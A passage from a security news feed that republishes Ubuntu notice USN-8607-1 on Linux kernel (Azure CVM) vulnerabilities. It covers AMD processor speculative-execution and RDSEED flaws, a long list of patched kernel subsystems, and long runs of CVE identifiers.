CVE-2026-31708, CVE-2026-31709, CVE-2026-31711, CVE-2026-31712,
CVE-2026-31714, CVE-2026-31715, CVE-2026-31716, CVE-2026-31720,
CVE-2026-31721, CVE-2026-31722, CVE-2026-31723, CVE-2026-31724,
CVE-2026-31725, CVE-2026-31726, CVE-2026-31728, CVE-2026-31729,
CVE-2026-31730, CVE-2026-31731, CVE-2026-31737, CVE-2026-31738,
CVE-2026-31740, CVE-2026-31741, CVE-2026-31747, CVE-2026-31748,
CVE-2026-31749, CVE-2026-31751, CVE-2026-31752, CVE-2026-31754,
CVE-2026-31755, CVE-2026-31756, CVE-2026-31758, CVE-2026-31759,
CVE-2026-31761, CVE-2026-31762, CVE-2026-31763, CVE-2026-31767,
CVE-2026-31768, CVE-2026-31770, CVE-2026-31772, CVE-2026-31773,
CVE-2026-31778, CVE-2026-31779, CVE-2026-31780, CVE-2026-31781,
CVE-2026-31788, CVE-2026-43007, CVE-2026-43011, CVE-2026-43012,
CVE-2026-43013, CVE-2026-43014, CVE-2026-43015, CVE-2026-43016,
CVE-2026-43017, CVE-2026-43018, CVE-2026-43019, CVE-2026-43020,
CVE-2026-43023, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026,
CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43032,
CVE-2026-43035, CVE-2026-43036, CVE-2026-43037, CVE-2026-43038,
CVE-2026-43040, CVE-2026-43041, CVE-2026-43043, CVE-2026-43044,
CVE-2026-43046, CVE-2026-43047, CVE-2026-43049, CVE-2026-43050,
CVE-2026-43051, CVE-2026-43052, CVE-2026-43054, CVE-2026-43056,
CVE-2026-43057, CVE-2026-43058, CVE-2026-43059, CVE-2026-43060,
CVE-2026-43061, CVE-2026-43062, CVE-2026-43064, CVE-2026-43065,
CVE-2026-43066, CVE-2026-43068, CVE-2026-43069, CVE-2026-43071,
CVE-2026-43072, CVE-2026-43073, CVE-2026-43074, CVE-2026-43075,
CVE-2026-43076, CVE-2026-43079, CVE-2026-43080, CVE-2026-43081,
CVE-2026-43082, CVE-2026-43085, CVE-2026-43086, CVE-2026-43088,
CVE-2026-43089, CVE-2026-43091, CVE-2026-43092, CVE-2026-43093,
CVE-2026-43094, CVE-2026-43098, CVE-2026-43099, CVE-2026-43103,
CVE-2026-43104, CVE-2026-43105, CVE-2026-43107, CVE-2026-43109,
CVE-2026-43110, CVE-2026-43111, CVE-2026-43112, CVE-2026-43113,
CVE-2026-43114, CVE-2026-43117, CVE-2026-43119, CVE-2026-43120,
CVE-2026-43123, CVE-2026-43124, CVE-2026-43128, CVE-2026-43129,
CVE-2026-43130, CVE-2026-43132, CVE-2026-43133, CVE-2026-43134,
CVE-2026-43135, CVE-2026-43136, CVE-2026-43137, CVE-2026-43139,
CVE-2026-43140, CVE-2026-43141, CVE-2026-43143, CVE-2026-43145,
CVE-2026-43147, CVE-2026-43148, CVE-2026-43149, CVE-2026-43150,
CVE-2026-43152, CVE-2026-43153, CVE-2026-43156, CVE-2026-43157,
CVE-2026-43158, CVE-2026-43159, CVE-2026-43162, CVE-2026-43163,
CVE-2026-43167, CVE-2026-43168, CVE-2026-43169, CVE-2026-43170,
CVE-2026-43171, CVE-2026-43173, CVE-2026-43175, CVE-2026-43180,
CVE-2026-43182, CVE-2026-43183, CVE-2026-43184, CVE-2026-43185,
CVE-2026-43186, CVE-2026-43187, CVE-2026-43189, CVE-2026-43190,
CVE-2026-43194, CVE-2026-43196, CVE-2026-43199, CVE-2026-43200,
CVE-2026-43201, CVE-2026-43202, CVE-2026-43203, CVE-2026-43205,
CVE-2026-43206, CVE-2026-43207, CVE-2026-43209, CVE-2026-43211,
CVE-2026-43212, CVE-2026-43214, CVE-2026-43215, CVE-2026-43218,
CVE-2026-43221, CVE-2026-43222, CVE-2026-43223, CVE-2026-43225,
CVE-2026-43226, CVE-2026-43227, CVE-2026-43230, CVE-2026-43231,
CVE-2026-43232, CVE-2026-43233, CVE-2026-43236, CVE-2026-43238,
CVE-2026-43239, CVE-2026-43241, CVE-2026-43242, CVE-2026-43244,
CVE-2026-43245, CVE-2026-43246, CVE-2026-43248, CVE-2026-43249,
CVE-2026-43250, CVE-2026-43251, CVE-2026-43252, CVE-2026-43253,
CVE-2026-43255, CVE-2026-43256, CVE-2026-43257, CVE-2026-43258,
CVE-2026-43261, CVE-2026-43262, CVE-2026-43264, CVE-2026-43265,
CVE-2026-43266, CVE-2026-43268, CVE-2026-43269, CVE-2026-43270,
CVE-2026-43271, CVE-2026-43273, CVE-2026-43275, CVE-2026-43277,
CVE-2026-43278, CVE-2026-43279, CVE-2026-43281, CVE-2026-43283,
CVE-2026-43287, CVE-2026-43288, CVE-2026-43289, CVE-2026-43291,
CVE-2026-43295, CVE-2026-43296, CVE-2026-43297, CVE-2026-43300,
CVE-2026-43302, CVE-2026-43304, CVE-2026-43312, CVE-2026-43313,
CVE-2026-43314, CVE-2026-43315, CVE-2026-43316, CVE-2026-43317,
CVE-2026-43318, CVE-2026-43319, CVE-2026-43320, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43341,
CVE-2026-43342, CVE-2026-43343, CVE-2026-43345, CVE-2026-43350,
CVE-2026-43355, CVE-2026-43357, CVE-2026-43359, CVE-2026-43360,
CVE-2026-43361, CVE-2026-43363, CVE-2026-43365, CVE-2026-43366,
CVE-2026-43368, CVE-2026-43370, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43378, CVE-2026-43380, CVE-2026-43381,
CVE-2026-43382, CVE-2026-43383, CVE-2026-43384, CVE-2026-43386,
CVE-2026-43387, CVE-2026-43395, CVE-2026-43397, CVE-2026-43405,
CVE-2026-43406, CVE-2026-43407, CVE-2026-43408, CVE-2026-43409,
CVE-2026-43411, CVE-2026-43412, CVE-2026-43413, CVE-2026-43414,
CVE-2026-43415, CVE-2026-43419, CVE-2026-43420, CVE-2026-43421,
CVE-2026-43424, CVE-2026-43425, CVE-2026-43426, CVE-2026-43427,
CVE-2026-43428, CVE-2026-43429, CVE-2026-43430, CVE-2026-43432,
CVE-2026-43436, CVE-2026-43437, CVE-2026-43439, CVE-2026-43441,
CVE-2026-43445, CVE-2026-43448, CVE-2026-43449, CVE-2026-43450,
CVE-2026-43451, CVE-2026-43452, CVE-2026-43453, CVE-2026-43455,
CVE-2026-43456, CVE-2026-43457, CVE-2026-43458, CVE-2026-43459,
CVE-2026-43466, CVE-2026-43467, CVE-2026-43468, CVE-2026-43469,
CVE-2026-43471, CVE-2026-43472, CVE-2026-43473, CVE-2026-43475,
CVE-2026-43476, CVE-2026-43480, CVE-2026-43483, CVE-2026-43484,
CVE-2026-43488, CVE-2026-43490, CVE-2026-43491, CVE-2026-43492,
CVE-2026-43493, CVE-2026-43495, CVE-2026-43496, CVE-2026-43497,
CVE-2026-43499, CVE-2026-43501, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45847,
CVE-2026-45848, CVE-2026-45849, CVE-2026-45851, CVE-2026-45852,
CVE-2026-45855, CVE-2026-45856, CVE-2026-45857, CVE-2026-45858,
CVE-2026-45859, CVE-2026-45860, CVE-2026-45861, CVE-2026-45862,
CVE-2026-45864, CVE-2026-45865, CVE-2026-45866, CVE-2026-45867,
CVE-2026-45868, CVE-2026-45869, CVE-2026-45870, CVE-2026-45871,
CVE-2026-45872, CVE-2026-45873, CVE-2026-45875, CVE-2026-45877,
CVE-2026-45878, CVE-2026-45879, CVE-2026-45880, CVE-2026-45881,
CVE-2026-45882, CVE-2026-45883, CVE-2026-45884, CVE-2026-45885,
CVE-2026-45886, CVE-2026-45890, CVE-2026-45891, CVE-2026-45893,
CVE-2026-45895, CVE-2026-45899, CVE-2026-45902, CVE-2026-45904,
CVE-2026-45905, CVE-2026-45910, CVE-2026-45911, CVE-2026-45912,
CVE-2026-45913, CVE-2026-45914, CVE-2026-45915, CVE-2026-45916,
CVE-2026-45917, CVE-2026-45919, CVE-2026-45920, CVE-2026-45921,
CVE-2026-45923, CVE-2026-45924, CVE-2026-45928, CVE-2026-45935,
CVE-2026-45936, CVE-2026-45938, CVE-2026-45941, CVE-2026-45942,
CVE-2026-45943, CVE-2026-45946, CVE-2026-45947, CVE-2026-45948,
CVE-2026-45954, CVE-2026-45956, CVE-2026-45957, CVE-2026-45958,
CVE-2026-45960, CVE-2026-45962, CVE-2026-45964, CVE-2026-45965,
CVE-2026-45968, CVE-2026-45969, CVE-2026-45970, CVE-2026-45972,
CVE-2026-45973, CVE-2026-45974, CVE-2026-45976, CVE-2026-45978,
CVE-2026-45981, CVE-2026-45982, CVE-2026-45983, CVE-2026-45984,
CVE-2026-45985, CVE-2026-45986, CVE-2026-45987, CVE-2026-45988,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46043,
CVE-2026-46044, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46056, CVE-2026-46058, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46068,
CVE-2026-46069, CVE-2026-46070, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46082, CVE-2026-46083,
CVE-2026-46084, CVE-2026-46086, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46094,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46106, CVE-2026-46107, CVE-2026-46108,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46115, CVE-2026-46116, CVE-2026-46117,
CVE-2026-46119, CVE-2026-46120, CVE-2026-46121, CVE-2026-46122,
CVE-2026-46123, CVE-2026-46124, CVE-2026-46125, CVE-2026-46126,
CVE-2026-46127, CVE-2026-46128, CVE-2026-46129, CVE-2026-46131,
CVE-2026-46132, CVE-2026-46133, CVE-2026-46135, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46185, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46189, CVE-2026-46190, CVE-2026-46191,
CVE-2026-46193, CVE-2026-46194, CVE-2026-46195, CVE-2026-46196,
CVE-2026-46197, CVE-2026-46198, CVE-2026-46199, CVE-2026-46200,
CVE-2026-46201, CVE-2026-46204, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46207, CVE-2026-46208, CVE-2026-46209, CVE-2026-46211,
CVE-2026-46212, CVE-2026-46214, CVE-2026-46218, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46225, CVE-2026-46226, CVE-2026-46227,
CVE-2026-46229, CVE-2026-46230, CVE-2026-46231, CVE-2026-46232,
CVE-2026-46233, CVE-2026-46234, CVE-2026-46235, CVE-2026-46236,
CVE-2026-46238, CVE-2026-46241, CVE-2026-46243, CVE-2026-46244,
CVE-2026-46246, CVE-2026-46247, CVE-2026-46249, CVE-2026-46250,
CVE-2026-46251, CVE-2026-46253, CVE-2026-46254, CVE-2026-46255,
CVE-2026-46259, CVE-2026-46260, CVE-2026-46261, CVE-2026-46265,
CVE-2026-46266, CVE-2026-46267, CVE-2026-46270, CVE-2026-46273,
CVE-2026-46274, CVE-2026-46280, CVE-2026-46282, CVE-2026-46285,
CVE-2026-46286, CVE-2026-46287, CVE-2026-46289, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-46328, CVE-2026-52911, CVE-2026-52920,
CVE-2026-52925, CVE-2026-52933, CVE-2026-52936, CVE-2026-52951,
CVE-2026-52954, CVE-2026-52955, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52967, CVE-2026-52968, CVE-2026-52969, CVE-2026-52970,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52977, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52995, CVE-2026-52998, CVE-2026-52999, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53006,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53039,
CVE-2026-53040, CVE-2026-53041, CVE-2026-53043, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53052, CVE-2026-53056, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53068, CVE-2026-53069, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53088, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53115,
CVE-2026-53117, CVE-2026-53122, CVE-2026-53123, CVE-2026-53126,
CVE-2026-53128, CVE-2026-53130, CVE-2026-53279, CVE-2026-53287,
CVE-2026-53289, CVE-2026-53291, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53303, CVE-2026-53304,
CVE-2026-53306, CVE-2026-53309, CVE-2026-53314, CVE-2026-53320,
CVE-2026-53369, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53379, CVE-2026-63838, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63851, CVE-2026-63852, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63860, CVE-2026-63861, CVE-2026-63862,
CVE-2026-63865, CVE-2026-64018, CVE-2026-64034)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8607-1: Linux kernel (Azure CVM) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691497/unix-server/usn-8607-1-linux-kernel-azure-cvm-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691497/unix-server/usn-8607-1-linux-kernel-azure-cvm-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - RNBD block device driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - Broadcom VK accelerator driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MOST (Media Oriented Systems Transport) drivers;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Performance monitor drivers;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Power supply drivers;
  - RapidIO drivers;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - MediaTek SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - ChipIdea USB driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - DesignWare USB3 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Virtio Host (VHOST) subsystem;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - JFS file system;
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - RCU subsystem;
  - Scheduler infrastructure;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - 9P file system network protocol;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - KCM (Kernel Connection Multiplexor) sockets driver;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Landlock security;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40005, CVE-2025-40135, CVE-2025-40150, CVE-2025-68175,
CVE-2025-68239, CVE-2025-68334, CVE-2025-68736, CVE-2025-71152,
CVE-2025-71161, CVE-2025-71203, CVE-2025-71221, CVE-2025-71229,
CVE-2025-71231, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71269,
CVE-2025-71272, CVE-2025-71273, CVE-2025-71274, CVE-2025-71286,
CVE-2025-71287, CVE-2025-71288, CVE-2025-71291, CVE-2025-71292,
CVE-2025-71294, CVE-2025-71295, CVE-2025-71297, CVE-2025-71304,
CVE-2025-71305, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23100, CVE-2026-23104,
CVE-2026-23118, CVE-2026-23138, CVE-2026-23154, CVE-2026-23157,
CVE-2026-23169, CVE-2026-23171, CVE-2026-23220, CVE-2026-23221,
CVE-2026-23222, CVE-2026-23226, CVE-2026-23227, CVE-2026-23228,
CVE-2026-23229, CVE-2026-23230, CVE-2026-23233, CVE-2026-23234,
CVE-2026-23235, CVE-2026-23236, CVE-2026-23237, CVE-2026-23238,
CVE-2026-23241, CVE-2026-23242, CVE-2026-23243, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23249, CVE-2026-23253,
CVE-2026-23255, CVE-2026-23266, CVE-2026-23267, CVE-2026-23270,
CVE-2026-23271, CVE-2026-23272, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23278, CVE-2026-23279, CVE-2026-23281, CVE-2026-23284,
CVE-2026-23285, CVE-2026-23286, CVE-2026-23287, CVE-2026-23289,
CVE-2026-23290, CVE-2026-23291, CVE-2026-23292, CVE-2026-23293,
CVE-2026-23296, CVE-2026-23298, CVE-2026-23300, CVE-2026-23302,
CVE-2026-23303, CVE-2026-23304, CVE-2026-23306, CVE-2026-23307,
CVE-2026-23308, CVE-2026-23310, CVE-2026-23312, CVE-2026-23313,
CVE-2026-23315, CVE-2026-23317, CVE-2026-23318, CVE-2026-23319,
CVE-2026-23321, CVE-2026-23324, CVE-2026-23325, CVE-2026-23330,
CVE-2026-23334, CVE-2026-23335, CVE-2026-23336, CVE-2026-23339,
CVE-2026-23340, CVE-2026-23343, CVE-2026-23347, CVE-2026-23352,
CVE-2026-23356, CVE-2026-23357, CVE-2026-23359, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23392, CVE-2026-23395, CVE-2026-23396,
CVE-2026-23397, CVE-2026-23398, CVE-2026-23399, CVE-2026-23401,
CVE-2026-23412, CVE-2026-23413, CVE-2026-23414, CVE-2026-23418,
CVE-2026-23419, CVE-2026-23420, CVE-2026-23426, CVE-2026-23428,
CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23440,
CVE-2026-23441, CVE-2026-23442, CVE-2026-23444, CVE-2026-23446,
CVE-2026-23447, CVE-2026-23448, CVE-2026-23449, CVE-2026-23450,
CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31402, CVE-2026-31403, CVE-2026-31405, CVE-2026-31407,
CVE-2026-31408, CVE-2026-31409, CVE-2026-31411, CVE-2026-31412,
CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417,
CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423,
CVE-2026-31424, CVE-2026-31425, CVE-2026-31426, CVE-2026-31427,
CVE-2026-31428, CVE-2026-31429, CVE-2026-31430, CVE-2026-31432,
CVE-2026-31433, CVE-2026-31436, CVE-2026-31438, CVE-2026-31439,
CVE-2026-31440, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447,
CVE-2026-31448, CVE-2026-31449, CVE-2026-31450, CVE-2026-31451,
CVE-2026-31452, CVE-2026-31453, CVE-2026-31454, CVE-2026-31455,
CVE-2026-31458, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31470, CVE-2026-31473, CVE-2026-31474,
CVE-2026-31476, CVE-2026-31477, CVE-2026-31478, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
